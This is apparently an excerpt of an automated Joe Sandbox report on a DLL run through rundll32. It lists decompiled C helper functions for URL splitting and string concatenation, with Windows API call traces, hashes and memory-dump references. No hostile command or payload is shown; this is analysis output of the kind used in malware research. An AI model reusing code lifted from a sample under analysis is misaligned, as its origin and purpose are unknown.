                • Opcode ID: de7d62002d00752edaa90be934dc0510b4a48655a9e8e88e0319456a2b65195d
                • Instruction ID: 333baac3b5e18a535f8a0433bfe204ae9229a5a8bc845f1e6894d2db7fd68531
                • Opcode Fuzzy Hash: de7d62002d00752edaa90be934dc0510b4a48655a9e8e88e0319456a2b65195d
                • Instruction Fuzzy Hash: BFF0F47151520ABFCF15CFA5DA55A6577FCFB09745B10015AE401D3200EB78FE04CB60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E04B95448(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                				intOrPtr* _v8;
                				void* _t17;
                				intOrPtr* _t22;
                				void* _t27;
                				char* _t30;
                				void* _t33;
                				void* _t34;
                				void* _t36;
                				void* _t37;
                				void* _t39;
                				int _t42;
                
                				_t17 = __eax;
                				_t37 = 0;
                				__imp__(_a4, _t33, _t36, _t27, __ecx);
                				_t2 = _t17 + 1; // 0x1
                				_t28 = _t2;
                				_t34 = E04B96601(_t2);
                				if(_t34 != 0) {
                					_t30 = E04B96601(_t28);
                					if(_t30 == 0) {
                						E04B94130(_t34);
                					} else {
                						_t39 = _a4;
                						_t22 = E04B97B8E(_t39);
                						_v8 = _t22;
                						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                							_a4 = _t39;
                						} else {
                							_t26 = _t22 + 2;
                							_a4 = _t22 + 2;
                							_t22 = E04B97B8E(_t26);
                							_v8 = _t22;
                						}
                						if(_t22 == 0) {
                							__imp__(_t34, _a4);
                							 *_t30 = 0x2f;
                							 *((char*)(_t30 + 1)) = 0;
                						} else {
                							_t42 = _t22 - _a4;
                							memcpy(_t34, _a4, _t42);
                							 *((char*)(_t34 + _t42)) = 0;
                							__imp__(_t30, _v8);
                						}
                						 *_a8 = _t34;
                						_t37 = 1;
                						 *_a12 = _t30;
                					}
                				}
                				return _t37;
                			}

                APIs
                • lstrlen.KERNEL32(00000000,00000008,?,74654D40,?,?,04B96416,?,?,?,?,00000102,04B946E0,?,?,746981D0), ref: 04B95454
                  • Part of subcall function 04B96601: RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                  • Part of subcall function 04B97B8E: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04B95482,00000000,00000001,00000001,?,?,04B96416,?,?,?,?,00000102), ref: 04B97B9C
                  • Part of subcall function 04B97B8E: StrChrA.SHLWAPI(?,0000003F,?,?,04B96416,?,?,?,?,00000102,04B946E0,?,?,746981D0,00000000), ref: 04B97BA6
                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04B96416,?,?,?,?,00000102,04B946E0,?), ref: 04B954B2
                • lstrcpy.KERNEL32(00000000,00000000), ref: 04B954C2
                • lstrcpy.KERNEL32(00000000,00000000), ref: 04B954CE
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                • String ID:
                • API String ID: 3767559652-0
                • Opcode ID: 719081c3c43455212ba3d0c3310f51dd61d41b9bbeba2e31393e64e2de9eab04
                • Instruction ID: e00d4feaf45f8ff23a298900fbd46d595631deda919c2d43d45a09530a373026
                • Opcode Fuzzy Hash: 719081c3c43455212ba3d0c3310f51dd61d41b9bbeba2e31393e64e2de9eab04
                • Instruction Fuzzy Hash: 3421CD72500225FBDF625F79C854AAABFE8EF46394F1580A4F8059B305DB35ED01C7A0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E04B917A4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                				void* _v8;
                				void* _t18;
                				int _t25;
                				int _t29;
                				int _t34;
                
                				_t29 = lstrlenW(_a4);
                				_t25 = lstrlenW(_a8);
                				_t18 = E04B96601(_t25 + _t29 + _t25 + _t29 + 2);
                				_v8 = _t18;
                				if(_t18 != 0) {
                					_t34 = _t29 + _t29;
                					memcpy(_t18, _a4, _t34);
                					_t10 = _t25 + 2; // 0x2
                					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                				}
                				return _v8;
                			}

                APIs
                • lstrlenW.KERNEL32(004F0053,?,74655520,00000008,051093CC,?,04B94281,004F0053,051093CC,?,?,?,?,?,?,04B91939), ref: 04B917B4
                • lstrlenW.KERNEL32(04B94281,?,04B94281,004F0053,051093CC,?,?,?,?,?,?,04B91939), ref: 04B917BB
                  • Part of subcall function 04B96601: RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                • memcpy.NTDLL(00000000,004F0053,746569A0,?,?,04B94281,004F0053,051093CC,?,?,?,?,?,?,04B91939), ref: 04B917DB
                • memcpy.NTDLL(746569A0,04B94281,00000002,00000000,004F0053,746569A0,?,?,04B94281,004F0053,051093CC), ref: 04B917EE
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: lstrlenmemcpy$AllocateHeap
                • String ID:
                • API String ID: 2411391700-0
                • Opcode ID: b8a4014affcbb1831d2675abf3e9fe909f61241f59f42d985f6bc5d766095edf
                • Instruction ID: 523ee925a56392757ffc241d82b7402fcdcaeaae753e33065cd54b46b0f9c9ba
                • Opcode Fuzzy Hash: b8a4014affcbb1831d2675abf3e9fe909f61241f59f42d985f6bc5d766095edf
                • Instruction Fuzzy Hash: A3F0F976900119FB9F11EFA9CC84CDF7BECEF0925871540A6F904D7201EA35EE159BA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(05109CE0,00000000,00000000,00000000,04B96E08,00000000), ref: 04B927C3
                • lstrlen.KERNEL32(?), ref: 04B927CB
                  • Part of subcall function 04B96601: RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                • lstrcpy.KERNEL32(00000000,05109CE0), ref: 04B927DF
                • lstrcat.KERNEL32(00000000,?), ref: 04B927EA
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                • String ID:
                • API String ID: 74227042-0
                • Opcode ID: 1211257400ba9433c2484ac661568781edc148e392e0dc652fdba00a5a097a35
                • Instruction ID: 5ca2252abc526f9fa249061bfab41873f684fcac9d4ee8f909205c9c060fab90
                • Opcode Fuzzy Hash: 1211257400ba9433c2484ac661568781edc148e392e0dc652fdba00a5a097a35
                • Instruction Fuzzy Hash: 88E06D73901621B78B115AB8AC48C9BBBADEF8A650304046BF600D3210CB29AC118BB1
                Uniqueness

                Uniqueness Score: -1.00%